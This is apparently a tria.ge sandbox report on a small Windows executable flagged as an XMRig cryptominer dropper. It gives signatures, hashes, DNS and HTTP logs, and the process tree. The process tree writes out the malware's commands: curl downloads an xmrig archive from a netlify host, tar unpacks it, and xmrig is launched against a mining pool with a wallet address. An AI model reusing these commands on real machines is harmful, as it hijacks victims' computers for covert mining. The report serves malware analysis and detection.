Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

test - Copy (10).exe

windows10-2004-x64

10

test - Copy (11).exe

windows10-2004-x64

10

test - Copy (12).exe

windows10-2004-x64

10

test - Copy (13).exe

windows10-2004-x64

10

test - Copy (14).exe

windows10-2004-x64

10

test - Copy (2).exe

windows10-2004-x64

10

test - Copy (3).exe

windows10-2004-x64

10

test - Copy (4).exe

windows10-2004-x64

10

test - Copy (5).exe

windows10-2004-x64

10

test - Copy (6).exe

windows10-2004-x64

10

test - Copy (7).exe

windows10-2004-x64

10

test - Copy (8).exe

windows10-2004-x64

10

test - Copy (9).exe

windows10-2004-x64

10

test - Copy.exe

windows10-2004-x64

10

test.exe

windows10-2004-x64

10

Resubmissions

11/03/2024, 21:08 UTC

240311-zy7ywsed31 10

11/03/2024, 21:06 UTC

240311-zx53xagd73 10

11/03/2024, 21:02 UTC

240311-zvwrfsec3x 10

11/03/2024, 21:01 UTC

240311-ztxx5aeb9x 10

11/03/2024, 20:59 UTC

240311-zs72psgc56 10

11/03/2024, 20:57 UTC

240311-zrmpdaeb3v 10

11/03/2024, 20:56 UTC

240311-zqzbsagb66 10

11/03/2024, 20:55 UTC

240311-zqlexsgb55 10

11/03/2024, 20:54 UTC

240311-zp4j4sgb43 10

11/03/2024, 20:53 UTC

240311-zplz3agb32 10

Analysis

  • max time kernel
    1043s
  • max time network
    1050s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/03/2024, 21:01 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    test - Copy (7).exe

  • Size

    6KB

  • MD5

    4634098fe194204dc03f967cc0b19cd6

  • SHA1

    eaa58619c6cea9f148cec61ee504cd727b3e80d8

  • SHA256

    a1070b8803e4243699a44a77e60a199282814495bc3bd94759c07021c0a6c70c

  • SHA512

    64e97fac56a25daf99f8ee1a9f480acc8020d5da4eb96ea77022c9170f6300b7b5479fce86e3e7e088cdaabdf123b65872e09b0ae17f8f97ea2fe58b6ecf7a9d

  • SSDEEP

    96:2Fb158Vgo4CVvAXklfZT8kYl9RxxgAVNb8ICcGKzNt:oMV1vAX+8kYDRxbLh4s

Score
10/10
xmrigminer

Malware Config

Signatures

  • XMRig Miner payload 63 IoCs
    miner
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\test - Copy (7).exe
    "C:\Users\Admin\AppData\Local\Temp\test - Copy (7).exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3JCYBaUJ.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2924
      • C:\Windows\system32\curl.exe
        curl -o "C:\xmrig\xmrig-6.21.1-gcc-win64.zip" https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
        3⤵
          PID:2996
        • C:\Windows\system32\tar.exe
          tar -xf "C:\xmrig\xmrig-6.21.1-gcc-win64.zip"
          3⤵
            PID:2716
          • C:\xmrig\xmrig-6.21.1\xmrig.exe
            C:\xmrig\xmrig-6.21.1\xmrig.exe --coin=XMR -o xmr.2miners.com:2222 -u 49QgS4Cu9uqVeqgDpwtdZWYZrDNrUJXfzDiGmwsZFLdEgQPAQV7SbswUHqZG3B45HAiSR1cYZoSvgC56kctnqsSjMNFnJmU.RIG -p x --cpu-affinity=5 --cpu-no-yield
            3⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:3088

      Network

      • flag-us
        DNS
        1488.netlify.app
        curl.exe
        Remote address:
        8.8.8.8:53
        Request
        1488.netlify.app
        IN A
        Response
        1488.netlify.app
        IN A
        18.192.231.252
        1488.netlify.app
        IN A
        3.70.101.28
      • flag-de
        GET
        https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
        curl.exe
        Remote address:
        18.192.231.252:443
        Request
        GET /xmrig-6.21.1-gcc-win64.zip HTTP/1.1
        Host: 1488.netlify.app
        User-Agent: curl/7.55.1
        Accept: */*
        Response
        HTTP/1.1 200 OK
        Accept-Ranges: bytes
        Age: 4532
        Cache-Control: public,max-age=0,must-revalidate
        Cache-Status: "Netlify Edge"; hit
        Content-Length: 3336525
        Content-Type: application/zip
        Date: Mon, 11 Mar 2024 21:01:29 GMT
        Etag: "3f561091cdba4bace650b26717533c91-ssl"
        Server: Netlify
        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
        X-Nf-Request-Id: 01HRQN4281203B3KYAHZKWDMVV
      • flag-us
        DNS
        g.bing.com
        Remote address:
        8.8.8.8:53
        Request
        g.bing.com
        IN A
        Response
        g.bing.com
        IN CNAME
        g-bing-com.a-0001.a-msedge.net
        g-bing-com.a-0001.a-msedge.net
        IN CNAME
        dual-a-0001.a-msedge.net
        dual-a-0001.a-msedge.net
        IN A
        204.79.197.200
        dual-a-0001.a-msedge.net
        IN A
        13.107.21.200
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid=
        Remote address:
        204.79.197.200:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MUID=2BF8F91D2C0B6142391DED222D2C60C4; domain=.bing.com; expires=Sat, 05-Apr-2025 21:01:28 GMT; path=/; SameSite=None; Secure; Priority=High;
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 20AEAD907F7042F38DE8FB12867AC729 Ref B: LON04EDGE0606 Ref C: 2024-03-11T21:01:28Z
        date: Mon, 11 Mar 2024 21:01:27 GMT
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid=
        Remote address:
        204.79.197.200:443
        Request
        GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=2BF8F91D2C0B6142391DED222D2C60C4
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MSPTC=5v2geG1XWAlH969Zt0klw5ey30PZebruXXqeSDAOOoE; domain=.bing.com; expires=Sat, 05-Apr-2025 21:01:28 GMT; path=/; Partitioned; secure; SameSite=None
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 1D4F9389B3A445FA81B373F09411A14F Ref B: LON04EDGE0606 Ref C: 2024-03-11T21:01:28Z
        date: Mon, 11 Mar 2024 21:01:27 GMT
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid=
        Remote address:
        204.79.197.200:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=2BF8F91D2C0B6142391DED222D2C60C4; MSPTC=5v2geG1XWAlH969Zt0klw5ey30PZebruXXqeSDAOOoE
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 108CD2B8E06B4AB8859C8FAB3CCACFEA Ref B: LON04EDGE0606 Ref C: 2024-03-11T21:01:28Z
        date: Mon, 11 Mar 2024 21:01:28 GMT
      • flag-us
        DNS
        252.231.192.18.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        252.231.192.18.in-addr.arpa
        IN PTR
        Response
        252.231.192.18.in-addr.arpa
        IN PTR
        ec2-18-192-231-252 eu-central-1compute amazonawscom
      • flag-us
        DNS
        204.178.17.96.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        204.178.17.96.in-addr.arpa
        IN PTR
        Response
        204.178.17.96.in-addr.arpa
        IN PTR
        a96-17-178-204deploystaticakamaitechnologiescom
      • flag-us
        DNS
        14.160.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        14.160.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        28.118.140.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        28.118.140.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        55.36.223.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        55.36.223.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        241.154.82.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        241.154.82.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        26.165.165.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        26.165.165.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        11.2.37.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        11.2.37.23.in-addr.arpa
        IN PTR
        Response
        11.2.37.23.in-addr.arpa
        IN PTR
        a23-37-2-11deploystaticakamaitechnologiescom
      • flag-us
        DNS
        183.142.211.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        183.142.211.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        206.23.85.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        206.23.85.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        xmr.2miners.com
        xmrig.exe
        Remote address:
        8.8.8.8:53
        Request
        xmr.2miners.com
        IN A
        Response
        xmr.2miners.com
        IN A
        162.19.139.184
      • flag-us
        DNS
        xmr.2miners.com
        xmrig.exe
        Remote address:
        8.8.8.8:53
        Request
        xmr.2miners.com
        IN A
      • flag-us
        DNS
        97.17.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        97.17.167.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        184.139.19.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        184.139.19.162.in-addr.arpa
        IN PTR
        Response
        184.139.19.162.in-addr.arpa
        IN PTR
        p062minerscom
      • flag-us
        DNS
        184.139.19.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        184.139.19.162.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        183.1.37.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        183.1.37.23.in-addr.arpa
        IN PTR
        Response
        183.1.37.23.in-addr.arpa
        IN PTR
        a23-37-1-183deploystaticakamaitechnologiescom
      • flag-us
        DNS
        86.23.85.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        86.23.85.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        171.39.242.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        171.39.242.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        140.71.91.104.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        140.71.91.104.in-addr.arpa
        IN PTR
        Response
        140.71.91.104.in-addr.arpa
        IN PTR
        a104-91-71-140deploystaticakamaitechnologiescom
      • flag-us
        DNS
        140.71.91.104.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        140.71.91.104.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        119.110.54.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        119.110.54.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        185.178.17.96.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        185.178.17.96.in-addr.arpa
        IN PTR
        Response
        185.178.17.96.in-addr.arpa
        IN PTR
        a96-17-178-185deploystaticakamaitechnologiescom
      • flag-us
        DNS
        16.173.189.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        16.173.189.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        134.71.91.104.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        134.71.91.104.in-addr.arpa
        IN PTR
        Response
        134.71.91.104.in-addr.arpa
        IN PTR
        a104-91-71-134deploystaticakamaitechnologiescom
      • flag-us
        DNS
        179.178.17.96.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        179.178.17.96.in-addr.arpa
        IN PTR
        Response
        179.178.17.96.in-addr.arpa
        IN PTR
        a96-17-178-179deploystaticakamaitechnologiescom
      • flag-us
        DNS
        32.179.17.96.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        32.179.17.96.in-addr.arpa
        IN PTR
        Response
        32.179.17.96.in-addr.arpa
        IN PTR
        a96-17-179-32deploystaticakamaitechnologiescom
      • flag-us
        DNS
        37.179.17.96.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        37.179.17.96.in-addr.arpa
        IN PTR
        Response
        37.179.17.96.in-addr.arpa
        IN PTR
        a96-17-179-37deploystaticakamaitechnologiescom
      • 18.192.231.252:443
        https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
        tls, http
        curl.exe
        72.7kB
         3.5MB
         1528
        2711

        HTTP Request

        GET https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip

        HTTP Response

        200
      • 204.79.197.200:443
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid=
        tls, http2
        2.5kB
         9.3kB
         22
        17

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=84e55726917d44439c9dfb8d26f423e8&localId=w:011BA1D4-FCB1-62A8-177E-91C13F9689FB&deviceId=6966557510629837&anid=

        HTTP Response

        204
      • 162.19.139.184:2222
        xmr.2miners.com
        xmrig.exe
        5.6kB
         21.1kB
         104
        103
      • 52.142.223.178:80
        46 B
         1
      • 8.8.8.8:53
        1488.netlify.app
        dns
        curl.exe
        62 B
         94 B
         1
        1

        DNS Request

        1488.netlify.app

        DNS Response

        18.192.231.252
        3.70.101.28

      • 8.8.8.8:53
        g.bing.com
        dns
        56 B
         158 B
         1
        1

        DNS Request

        g.bing.com

        DNS Response

        204.79.197.200
        13.107.21.200

      • 8.8.8.8:53
        252.231.192.18.in-addr.arpa
        dns
        73 B
         140 B
         1
        1

        DNS Request

        252.231.192.18.in-addr.arpa

      • 8.8.8.8:53
        204.178.17.96.in-addr.arpa
        dns
        72 B
         137 B
         1
        1

        DNS Request

        204.178.17.96.in-addr.arpa

      • 8.8.8.8:53
        14.160.190.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        14.160.190.20.in-addr.arpa

      • 8.8.8.8:53
        28.118.140.52.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        28.118.140.52.in-addr.arpa

      • 8.8.8.8:53
        55.36.223.20.in-addr.arpa
        dns
        71 B
         157 B
         1
        1

        DNS Request

        55.36.223.20.in-addr.arpa

      • 8.8.8.8:53
        241.154.82.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        241.154.82.20.in-addr.arpa

      • 8.8.8.8:53
        26.165.165.52.in-addr.arpa
        dns
        72 B
         146 B
         1
        1

        DNS Request

        26.165.165.52.in-addr.arpa

      • 8.8.8.8:53
        11.2.37.23.in-addr.arpa
        dns
        69 B
         131 B
         1
        1

        DNS Request

        11.2.37.23.in-addr.arpa

      • 8.8.8.8:53
        183.142.211.20.in-addr.arpa
        dns
        73 B
         159 B
         1
        1

        DNS Request

        183.142.211.20.in-addr.arpa

      • 8.8.8.8:53
        206.23.85.13.in-addr.arpa
        dns
        71 B
         145 B
         1
        1

        DNS Request

        206.23.85.13.in-addr.arpa

      • 8.8.8.8:53
        xmr.2miners.com
        dns
        xmrig.exe
        122 B
         77 B
         2
        1

        DNS Request

        xmr.2miners.com

        DNS Request

        xmr.2miners.com

        DNS Response

        162.19.139.184

      • 8.8.8.8:53
        97.17.167.52.in-addr.arpa
        dns
        71 B
         145 B
         1
        1

        DNS Request

        97.17.167.52.in-addr.arpa

      • 8.8.8.8:53
        184.139.19.162.in-addr.arpa
        dns
        146 B
         102 B
         2
        1

        DNS Request

        184.139.19.162.in-addr.arpa

        DNS Request

        184.139.19.162.in-addr.arpa

      • 8.8.8.8:53
        183.1.37.23.in-addr.arpa
        dns
        70 B
         133 B
         1
        1

        DNS Request

        183.1.37.23.in-addr.arpa

      • 8.8.8.8:53
        86.23.85.13.in-addr.arpa
        dns
        70 B
         144 B
         1
        1

        DNS Request

        86.23.85.13.in-addr.arpa

      • 8.8.8.8:53
        171.39.242.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        171.39.242.20.in-addr.arpa

      • 8.8.8.8:53
        140.71.91.104.in-addr.arpa
        dns
        144 B
         137 B
         2
        1

        DNS Request

        140.71.91.104.in-addr.arpa

        DNS Request

        140.71.91.104.in-addr.arpa

      • 8.8.8.8:53
        119.110.54.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        119.110.54.20.in-addr.arpa

      • 8.8.8.8:53
        185.178.17.96.in-addr.arpa
        dns
        72 B
         137 B
         1
        1

        DNS Request

        185.178.17.96.in-addr.arpa

      • 8.8.8.8:53
        16.173.189.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        16.173.189.20.in-addr.arpa

      • 8.8.8.8:53
        134.71.91.104.in-addr.arpa
        dns
        72 B
         137 B
         1
        1

        DNS Request

        134.71.91.104.in-addr.arpa

      • 8.8.8.8:53
        179.178.17.96.in-addr.arpa
        dns
        72 B
         137 B
         1
        1

        DNS Request

        179.178.17.96.in-addr.arpa

      • 8.8.8.8:53
        32.179.17.96.in-addr.arpa
        dns
        71 B
         135 B
         1
        1

        DNS Request

        32.179.17.96.in-addr.arpa

      • 8.8.8.8:53
        37.179.17.96.in-addr.arpa
        dns
        71 B
         135 B
         1
        1

        DNS Request

        37.179.17.96.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\xmrig\xmrig-6.21.1-gcc-win64.zip
        Filesize

        3.2MB

        MD5

        e27f13ffb2989f290f16f8edd1c80171

        SHA1

        352a34a66152f4998b8d9152356528f980de2ef5

        SHA256

        fa6214ad822c6a70ee064de975608438a55eac4de41a5bb20f7180895e0524f9

        SHA512

        549a1c129ba53006e664b710361b860f9fdd58dc4682b36733fd3d10c36aa80fb28610d47ec18a8e91dad55542a83b58f5df79a8b9928cbe851b3557fde2b06a

        Download Submit

      • C:\xmrig\xmrig-6.21.1\xmrig.exe
        Filesize

        7.0MB

        MD5

        e7bf91ed1f2798efe90a9a176e4a8e9c

        SHA1

        2ae3ee0dc334fbb128f2e4170237869ff3c4db0e

        SHA256

        05f48068b7549d8ec79f1f8ef959595e19378c014ae51d24193d5ee64faaf13f

        SHA512

        712599fe7e220cf5da3920ed9414a2e06f4c9495b24b6e54cfe23f213d9d83317b740577591031a81541d75d40c10f62225e73975cdad6e0696c518d837670fd

        Download Submit

      • memory/1992-0-0x00000000001D0000-0x00000000001D8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1992-5-0x00007FF873F20000-0x00007FF8749E1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1992-22-0x00007FF873F20000-0x00007FF8749E1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3088-23-0x00000282923C0000-0x00000282923E0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/3088-24-0x0000028293BC0000-0x0000028293BE0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/3088-25-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-26-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-27-0x0000028293BE0000-0x0000028293C00000-memory.dmp

        Filesize

        128KB

        Download

      • memory/3088-28-0x0000028293C00000-0x0000028293C20000-memory.dmp

        Filesize

        128KB

        Download

      • memory/3088-29-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-30-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-31-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-32-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-33-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-35-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-36-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-37-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-38-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-39-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-40-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-41-0x0000028293BE0000-0x0000028293C00000-memory.dmp

        Filesize

        128KB

        Download

      • memory/3088-42-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-44-0x0000028293C00000-0x0000028293C20000-memory.dmp

        Filesize

        128KB

        Download

      • memory/3088-43-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-45-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-46-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-47-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-48-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-49-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-50-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-51-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-52-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-53-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-54-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-55-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-56-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-57-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-58-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-59-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-60-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-61-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-62-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-63-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-64-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-65-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-66-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-67-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-68-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-69-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-70-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-71-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-72-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-73-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-74-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-75-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-76-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-77-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-78-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-79-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

      • memory/3088-80-0x00007FF6CDCD0000-0x00007FF6CE7D4000-memory.dmp

        Filesize

        11.0MB

        Download

